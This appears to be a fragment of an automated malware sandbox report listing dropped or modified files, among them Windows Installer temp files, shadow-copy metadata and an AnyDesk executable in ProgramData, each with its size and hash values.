  Filesize: 1003B
  MD5: 6d5cd56a9caefa9be8debb4b019725ae
  SHA1: bbdbfc8de70f8600e6fe7f6b06511632f1d57f1e
  SHA256: 1411873c82b661f5953158c592725f3dd03381e159515fedbc68cf08e8353c97
  SHA512: 57b25ab44f5668ac7a863692d596e630211aaf06d770e30586163f1a04fad8c9ae693eba0c89e47d31cf0f80f6a3b7efd590bcbac0d9822f47e852c326b551f1
- C:\Windows\Installer\MSI155F.tmp
  Filesize: 208KB
  MD5: 4caaa03e0b59ca60a3d34674b732b702
  SHA1: ee80c8f4684055ac8960b9720fb108be07e1d10c
  SHA256: d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d
  SHA512: 25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34
- C:\Windows\Installer\MSIB6D0.tmp
  Filesize: 208KB
  MD5: 4caaa03e0b59ca60a3d34674b732b702
  SHA1: ee80c8f4684055ac8960b9720fb108be07e1d10c
  SHA256: d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d
  SHA512: 25888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34
-
C:\Windows\Installer\MSIB6D0.tmpFilesize
208KB
MD54caaa03e0b59ca60a3d34674b732b702
SHA1ee80c8f4684055ac8960b9720fb108be07e1d10c
SHA256d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d
SHA51225888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34
-
C:\Windows\Installer\MSIB7AB.tmpFilesize
208KB
MD54caaa03e0b59ca60a3d34674b732b702
SHA1ee80c8f4684055ac8960b9720fb108be07e1d10c
SHA256d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d
SHA51225888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34
-
C:\Windows\Installer\MSIB7AB.tmpFilesize
208KB
MD54caaa03e0b59ca60a3d34674b732b702
SHA1ee80c8f4684055ac8960b9720fb108be07e1d10c
SHA256d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d
SHA51225888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34
-
C:\Windows\Installer\MSIDCC.tmpFilesize
208KB
MD54caaa03e0b59ca60a3d34674b732b702
SHA1ee80c8f4684055ac8960b9720fb108be07e1d10c
SHA256d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d
SHA51225888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34
-
C:\Windows\Installer\MSIDCC.tmpFilesize
208KB
MD54caaa03e0b59ca60a3d34674b732b702
SHA1ee80c8f4684055ac8960b9720fb108be07e1d10c
SHA256d01af2b8c692dffb04a5a04e3ccd0d0a3b2c67c8fc45a4b68c0a065b4e64cc3d
SHA51225888848871286bdd1f9c43a0fba35640edb5bafbe0c6aa2f9708a070ea4e5b16745b7c4f744ae4f5643f75ef47f196d430bf70921ed27715f712825ec590a34
-
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2Filesize
23.0MB
MD5ad9e61c3c77e93761334126063467bd5
SHA117adcfb02d3a4998bd4df212c26fed085c8f230e
SHA256ce4a13643a6cc763cf9a837b0e8a87250f3c96b872f9651b8065979505470bf1
SHA5123d42ce7d81fec01bac69abddfdc535695aeaaa198fed6cf2dcfdd26f8fa94da6a5da0797a06546a829c5c0195f3e64562e12c4dca7133ee59cd3322011e5b800
-
\??\Volume{40beaa24-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{05d60ed7-5737-4afd-800f-11cf018fcf0e}_OnDiskSnapshotPropFilesize
5KB
MD5ef999512c78ba2bd91a6063cb4104ff7
SHA1ddfd4c2c6edde8634f44aa8df78d9b284cb6dcc5
SHA25642afaa6d9ab6b769f643c9c514343271e4af1cd50be39ca06a551ce2355a23e3
SHA51290b37a3dff4e1cfbc68d181e1173ca567ef7dd4c6382ba05651cad16441ab61f7245d525268d73ab18ab65c3e289c529034f5278d4e77d94c6e8fe115146de6b
-
\??\c:\programdata\anydesk.exeFilesize
3.7MB
MD51bc5890c9e7bf54b7712e344b0af9d04
SHA178c9302c7a387a8d158f38d501784be9b8b2716d
SHA256af61905129f377f5934b3bbf787e8d2417901858bb028f40f02200e985ee62f6
SHA5127113888a8439ae5af1b260c40229f7ebb98bdece52ebab0ce97137933af4e9777d92d68166dbcf87a95cf88615452cae7ecdf555b4785fffe63c5783dbcb595d
-